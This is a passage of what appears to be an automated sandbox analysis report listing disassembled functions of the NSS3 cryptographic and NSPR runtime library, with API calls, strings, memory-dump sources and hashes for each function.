                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 59B185B6D403469FEB00CFA4DD52BAABBB4FF18308F104165E914A7361E779D990CBA1
                                                                                                                                                                                                                                                            Function 6BF029A0 Relevance: 31.8, APIs: 15, Strings: 3, Instructions: 292COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PK11_ImportPublicKey.NSS3(00000000,?,00000000,?,?,?,?,?,^jk,00000001,00000000,?,6BED6540,?,0000000D,00000000), ref: 6BF02A39
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,^jk,00000001,00000000,?,6BED6540,?,0000000D,00000000), ref: 6BF02A5B
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,^jk,00000001,00000000,?,6BED6540,?,0000000D), ref: 6BF02A6F
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,^jk,00000001), ref: 6BF02AAD
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,^jk,00000001,00000000), ref: 6BF02ACB
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,^jk,00000001), ref: 6BF02ADF
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6BF02B38
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6BF02B8B
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6BE4204A), ref: 6BEB07AD
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BE4204A), ref: 6BEB07CD
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BE4204A), ref: 6BEB07D6
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6BE4204A), ref: 6BEB07E4
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,6BE4204A), ref: 6BEB0864
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6BEB0880
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,?,6BE4204A), ref: 6BEB08CB
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsGetValue.KERNEL32(?,?,6BE4204A), ref: 6BEB08D7
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsGetValue.KERNEL32(?,?,6BE4204A), ref: 6BEB08FB
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE040,00000000,?,?,?,?,?,^jk,00000001,00000000,?,6BED6540,?,0000000D,00000000,?), ref: 6BF02CA2
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Value$Unlock$CriticalEnterSectioncalloc$ErrorImportK11_Public
                                                                                                                                                                                                                                                            • String ID: @ek$@ek$^jk
                                                                                                                                                                                                                                                            • API String ID: 2580468248-2661418573
                                                                                                                                                                                                                                                            • Opcode ID: 5f8959f5d0b4052d753d7fd9054e14b472cd28655bbb91db767fe87d653c0cbd
                                                                                                                                                                                                                                                            • Instruction ID: 616dd72c4e457f804aef004cb21a0e1b6367f3bff0bf79f6e346981f683f7f37
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5f8959f5d0b4052d753d7fd9054e14b472cd28655bbb91db767fe87d653c0cbd
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A5B1CAB6D002059FDB109F68D885B9AF7B5FF09314F148569EC05A3631EB3AE940DBA1
                                                                                                                                                                                                                                                            Function 6BEC98E0 Relevance: 31.8, APIs: 16, Strings: 2, Instructions: 280stringCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 6BEE06A0: TlsGetValue.KERNEL32 ref: 6BEE06C2
                                                                                                                                                                                                                                                              • Part of subcall function 6BEE06A0: EnterCriticalSection.KERNEL32(?), ref: 6BEE06D6
                                                                                                                                                                                                                                                              • Part of subcall function 6BEE06A0: PR_Unlock.NSS3 ref: 6BEE06EB
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE018,00000000,?,?,?,6BEC2D6B,?,?,00000000), ref: 6BEC9BA9
                                                                                                                                                                                                                                                              • Part of subcall function 6BEE1750: PR_EnterMonitor.NSS3(?,?,00000000,00000000,?,6BEC991E,00000000,00000000,?,?,?,6BEC2D6B,?,?,00000000), ref: 6BEE1769
                                                                                                                                                                                                                                                              • Part of subcall function 6BEE1750: PR_ExitMonitor.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6BEC2D6B,?,?,00000000), ref: 6BEE180C
                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,?,6BEC2D6B,?,?,00000000), ref: 6BEC9930
                                                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,6BEC2D6B,?,?,00000000), ref: 6BEC995D
                                                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(00000000,?,00000001,?,?,?,?,?,?,?,?,6BEC2D6B,?,?,00000000), ref: 6BEC997E
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,6BEC2D6B,?,?,00000000), ref: 6BEC99AD
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,6BEC2D6B,?,?,00000000), ref: 6BEC99C4
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,6BEC2D6B,?,?,00000000), ref: 6BEC99E2
                                                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6BEC2D6B), ref: 6BEC9A1F
                                                                                                                                                                                                                                                            • PK11_GetInternalKeySlot.NSS3(?,?,?,?,?,?,?,?,6BEC2D6B,?,?,00000000), ref: 6BEC9A27
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6BEC9AE1
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(00000000), ref: 6BEC9AF5
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3 ref: 6BEC9B11
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6BEC9B3B
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(00000000), ref: 6BEC9B4F
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3 ref: 6BEC9B72
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE08A,00000000), ref: 6BEC9BC7
                                                                                                                                                                                                                                                              • Part of subcall function 6BED89E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6BED88AE,-00000008), ref: 6BED8A04
                                                                                                                                                                                                                                                              • Part of subcall function 6BED89E0: EnterCriticalSection.KERNEL32(?), ref: 6BED8A15
                                                                                                                                                                                                                                                              • Part of subcall function 6BED89E0: memset.VCRUNTIME140(6BED88AE,00000000,00000132), ref: 6BED8A27
                                                                                                                                                                                                                                                              • Part of subcall function 6BED89E0: PR_Unlock.NSS3(?), ref: 6BED8A35
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Enter$CriticalSectionUnlockValue$ErrorMonitor$ExitInternalItem_K11_SlotUtilZfreememcpymemsetstrcmpstrlen
                                                                                                                                                                                                                                                            • String ID: k-k$k-k
                                                                                                                                                                                                                                                            • API String ID: 568628329-886008926
                                                                                                                                                                                                                                                            • Opcode ID: 0405d9882d0a9484daee20f7457b5e28573e767b02bf76d9e325fa9d17f66049
                                                                                                                                                                                                                                                            • Instruction ID: 0998d57f6d33606695a5b292ed0c65409611b61ebb6e1eac0ae41e7648f71bed
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0405d9882d0a9484daee20f7457b5e28573e767b02bf76d9e325fa9d17f66049
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5791F5B6D00105ABEB019F74DD46BABB7B8AF4530CF244168EC1897212FB39E955C7E2
                                                                                                                                                                                                                                                            Function 6BED38C0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 168COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE028,00000000,?), ref: 6BED38F2
                                                                                                                                                                                                                                                            • SECKEY_ECParamsToBasePointOrderLen.NSS3(-00000010,?,?,?,?,?), ref: 6BED3902
                                                                                                                                                                                                                                                            • SECITEM_CopyItem_Util.NSS3(00000000,00000014,00000000), ref: 6BED3AB0
                                                                                                                                                                                                                                                            • SECITEM_CopyItem_Util.NSS3(00000000,00000038,?), ref: 6BED3AEA
                                                                                                                                                                                                                                                            • SECITEM_CopyItem_Util.NSS3(00000000,00000014,00000000), ref: 6BED3B03
                                                                                                                                                                                                                                                            • SECITEM_CopyItem_Util.NSS3(00000000,00000020,?), ref: 6BED3B1C
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE028,00000000), ref: 6BED3B40
                                                                                                                                                                                                                                                            • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6BED3B70
                                                                                                                                                                                                                                                            • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6BED3B88
                                                                                                                                                                                                                                                            • PR_CallOnce.NSS3(6C022AA4,6BF212D0), ref: 6BED3B9D
                                                                                                                                                                                                                                                            • PL_FreeArenaPool.NSS3(?), ref: 6BED3BB2
                                                                                                                                                                                                                                                            • PL_FinishArenaPool.NSS3(?), ref: 6BED3BBD
                                                                                                                                                                                                                                                            • SECITEM_CopyItem_Util.NSS3(00000000,00000010,?), ref: 6BED3BD4
                                                                                                                                                                                                                                                            • SECITEM_CopyItem_Util.NSS3(00000000,-00000020,o^k), ref: 6BED3BF2
                                                                                                                                                                                                                                                            • PK11_DestroyObject.NSS3(?,?), ref: 6BED3C1B
                                                                                                                                                                                                                                                            • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6BED3C40
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Util$Item_$Copy$ArenaPool$ErrorFree$Arena_BaseCallDecodeDestroyFinishInitK11_ObjectOnceOrderParamsPointQuick
                                                                                                                                                                                                                                                            • String ID: o^k$security
                                                                                                                                                                                                                                                            • API String ID: 3293387093-1624957545
                                                                                                                                                                                                                                                            • Opcode ID: 32ac1670bfe98a14f4c2629da5438c815b38bf498d764fdcdf43887a63d0ba9d
                                                                                                                                                                                                                                                            • Instruction ID: f22384eb53baef8ffdd6f3158fa456b9f4c3a392c9a8cf64d4c37883dac42a0c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 32ac1670bfe98a14f4c2629da5438c815b38bf498d764fdcdf43887a63d0ba9d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C251C7B6D04206ABE720CF65EC82F6A73B8EF1470CF140569EC05D6261F76EE616C761
                                                                                                                                                                                                                                                            Function 6BFD79A0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 112threadCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PR_GetCurrentThread.NSS3(00000000,?,?,6BFD798A), ref: 6BFD79A5
                                                                                                                                                                                                                                                              • Part of subcall function 6BF89BF0: TlsGetValue.KERNEL32(?,?,?,6BFD0A75), ref: 6BF89C07
                                                                                                                                                                                                                                                            • PR_LogPrint.NSS3(PR_Cleanup: shutting down NSPR), ref: 6BFD79D4
                                                                                                                                                                                                                                                            • PR_Lock.NSS3 ref: 6BFD79EC
                                                                                                                                                                                                                                                            • PR_WaitCondVar.NSS3(000000FF,6BFD798A), ref: 6BFD7A09
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3 ref: 6BFD7A37
                                                                                                                                                                                                                                                            • PR_DestroyLock.NSS3(?,6BFD798A), ref: 6BFD7A4A
                                                                                                                                                                                                                                                            • PR_DestroyLock.NSS3(?,?,6BFD798A), ref: 6BFD7A60
                                                                                                                                                                                                                                                            • PR_DestroyLock.NSS3(?,?,?,6BFD798A), ref: 6BFD7A74
                                                                                                                                                                                                                                                            • PR_DestroyCondVar.NSS3(?,?,?,?,6BFD798A), ref: 6BFD7A88
                                                                                                                                                                                                                                                            • PR_DestroyLock.NSS3(?,?,?,?,?,?,6BFD798A), ref: 6BFD7AA5
                                                                                                                                                                                                                                                            • PR_LogPrint.NSS3(PR_Cleanup: clean up before destroying thread,?,?,?,?,?,?,6BFD798A), ref: 6BFD7AD5
                                                                                                                                                                                                                                                            • PR_DestroyLock.NSS3(?,?,?,?,?,?,?,?,6BFD798A), ref: 6BFD7B04
                                                                                                                                                                                                                                                            • PR_DestroyLock.NSS3(?,?,?,?,?,?,?,?,?,?,6BFD798A), ref: 6BFD7B25
                                                                                                                                                                                                                                                            • PT_FPrintStats.NSS3(?,?,?,?,?,?,?,?,?,6BFD798A), ref: 6BFD7B3C
                                                                                                                                                                                                                                                            • PR_DestroyLock.NSS3(?,?,?,?,?,?,?,?,?,?,6BFD798A), ref: 6BFD7B4B
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • PR_Cleanup: shutting down NSPR, xrefs: 6BFD79CF
                                                                                                                                                                                                                                                            • PR_Cleanup: clean up before destroying thread, xrefs: 6BFD7AD0
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DestroyLock$Print$Cond$CurrentStatsThreadUnlockValueWait
                                                                                                                                                                                                                                                            • String ID: PR_Cleanup: clean up before destroying thread$PR_Cleanup: shutting down NSPR
                                                                                                                                                                                                                                                            • API String ID: 1189278590-4285429502
                                                                                                                                                                                                                                                            • Opcode ID: 2e1344bc97c9fad60f69a89af44b387360b1c124bcb22f33bb3ca3286a920b05
                                                                                                                                                                                                                                                            • Instruction ID: 5a2bcca859626b0a678000ce168423b9beb88229ccf3a8f9f7767eb79de2908c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2e1344bc97c9fad60f69a89af44b387360b1c124bcb22f33bb3ca3286a920b05
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E44162F7A101425BEB019F70EC4AB0A76B9AB5221DF684134D8055A233EF3ED954CB62
                                                                                                                                                                                                                                                            Function 6BEB19A0 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 141networkCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PR_GetEnvSecure.NSS3(NSPR_FD_CACHE_SIZE_LOW), ref: 6BEB19BB
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB1240: TlsGetValue.KERNEL32(00000040,?,6BEB116C,NSPR_LOG_MODULES), ref: 6BEB1267
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB1240: EnterCriticalSection.KERNEL32(?,?,?,6BEB116C,NSPR_LOG_MODULES), ref: 6BEB127C
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB1240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6BEB116C,NSPR_LOG_MODULES), ref: 6BEB1291
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB1240: PR_Unlock.NSS3(?,?,?,?,6BEB116C,NSPR_LOG_MODULES), ref: 6BEB12A0
                                                                                                                                                                                                                                                            • PR_GetEnvSecure.NSS3(NSPR_FD_CACHE_SIZE_HIGH), ref: 6BEB19CA
                                                                                                                                                                                                                                                            • PR_NewLock.NSS3 ref: 6BEB1A17
                                                                                                                                                                                                                                                              • Part of subcall function 6BF898D0: calloc.MOZGLUE(00000001,00000084,6BEB0936,00000001,?,6BEB102C), ref: 6BF898E5
                                                                                                                                                                                                                                                            • PR_NewLock.NSS3 ref: 6BEB1A21
                                                                                                                                                                                                                                                              • Part of subcall function 6BF898D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6BF89946
                                                                                                                                                                                                                                                              • Part of subcall function 6BF898D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6BE416B7,00000000), ref: 6BF8994E
                                                                                                                                                                                                                                                              • Part of subcall function 6BF898D0: free.MOZGLUE(00000000), ref: 6BF8995E
                                                                                                                                                                                                                                                            • PR_NewCondVar.NSS3(00000000), ref: 6BEB1A2C
                                                                                                                                                                                                                                                              • Part of subcall function 6BEABB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6BEB21BC), ref: 6BEABB8C
                                                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 6BEB1A3B
                                                                                                                                                                                                                                                              • Part of subcall function 6BE440C0: malloc.MOZGLUE(00000018,00000000,00000000,?,6BEB1A48), ref: 6BE440D9
                                                                                                                                                                                                                                                              • Part of subcall function 6BE440C0: malloc.MOZGLUE(0000001C,6BEB1A48), ref: 6BE440EC
                                                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F5), ref: 6BEB1A6F
                                                                                                                                                                                                                                                              • Part of subcall function 6BE440C0: PR_Lock.NSS3(00000000,00000000,?,6BEB1A48), ref: 6BE44128
                                                                                                                                                                                                                                                              • Part of subcall function 6BE440C0: PR_Unlock.NSS3(6BEB1A48), ref: 6BE44140
                                                                                                                                                                                                                                                              • Part of subcall function 6BE440C0: free.MOZGLUE(00000000), ref: 6BE4414B
                                                                                                                                                                                                                                                              • Part of subcall function 6BE440C0: PR_Unlock.NSS3(6BEB1A48), ref: 6BE44178
                                                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F4), ref: 6BEB1AA3
                                                                                                                                                                                                                                                            • WSAStartup.WSOCK32(00000101,?), ref: 6BEB1B00
                                                                                                                                                                                                                                                            • atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000), ref: 6BEB1B27
                                                                                                                                                                                                                                                            • atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000), ref: 6BEB1B40
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE890,00000000), ref: 6BEB1B80
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE890,00000000), ref: 6BEB1B94
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE890,00000000), ref: 6BEB1BA8
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Error$HandleLockUnlock$CriticalSectionSecureatoicallocfreemalloc$CondCountEnterInitializeLastSpinStartupValuegetenv
                                                                                                                                                                                                                                                            • String ID: NSPR_FD_CACHE_SIZE_HIGH$NSPR_FD_CACHE_SIZE_LOW
                                                                                                                                                                                                                                                            • API String ID: 1503490954-91517431
                                                                                                                                                                                                                                                            • Opcode ID: 4ace0c4bcb596c30dbaac3d9436209f43029675eb39ccbbe69a9da55399dbad3
                                                                                                                                                                                                                                                            • Instruction ID: 254f7b32bd1cabe577e2feaf7735706b2bdb4fdcb49cc4ac144b62f4f8d734ae
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4ace0c4bcb596c30dbaac3d9436209f43029675eb39ccbbe69a9da55399dbad3
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6F51F7B2E10221DFDB109FE9DA85A15B7F4AB06B64F35053AE81987351EB3DDC40C792
                                                                                                                                                                                                                                                            Function 6BEC4AF0 Relevance: 27.4, APIs: 18, Instructions: 355memorystringthreadCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000,00000000,00000000,?,?,6BF01444,?,?,00000000,?,?), ref: 6BEC4BD4
                                                                                                                                                                                                                                                              • Part of subcall function 6BF00C90: PR_SetError.NSS3(00000000,00000000,6BF01444,?,00000001,?,00000000,00000000,?,?,6BF01444,?,?,00000000,?,?), ref: 6BF00CB3
                                                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6BF01444), ref: 6BEC4B87
                                                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(00000000,?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BEC4BA5
                                                                                                                                                                                                                                                              • Part of subcall function 6BF188E0: TlsGetValue.KERNEL32(00000000,?,?,6BF208AA,?), ref: 6BF188F6
                                                                                                                                                                                                                                                              • Part of subcall function 6BF188E0: EnterCriticalSection.KERNEL32(?,?,?,?,6BF208AA,?), ref: 6BF1890B
                                                                                                                                                                                                                                                              • Part of subcall function 6BF188E0: PR_NotifyCondVar.NSS3(?,?,?,?,?,6BF208AA,?), ref: 6BF18936
                                                                                                                                                                                                                                                              • Part of subcall function 6BF188E0: PR_Unlock.NSS3(?,?,?,?,?,6BF208AA,?), ref: 6BF18940
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE02A,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BEC4DF5
                                                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 6BEC4B94
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: TlsGetValue.KERNEL32(?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF210F3
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: EnterCriticalSection.KERNEL32(?,?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF2110C
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: PL_ArenaAllocate.NSS3(?,?,?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF21141
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: PR_Unlock.NSS3(?,?,?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF21182
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: TlsGetValue.KERNEL32(?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF2119C
                                                                                                                                                                                                                                                            • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6BF01444,?), ref: 6BEC4BC2
                                                                                                                                                                                                                                                            • PR_GetCurrentThread.NSS3(?,?,?,?,?,00000000,00000000), ref: 6BEC4BEF
                                                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6BF01444), ref: 6BEC4C27
                                                                                                                                                                                                                                                            • SECITEM_CompareItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6BF01444), ref: 6BEC4C42
                                                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6BEC4D5A
                                                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,00000001), ref: 6BEC4D67
                                                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6BEC4D78
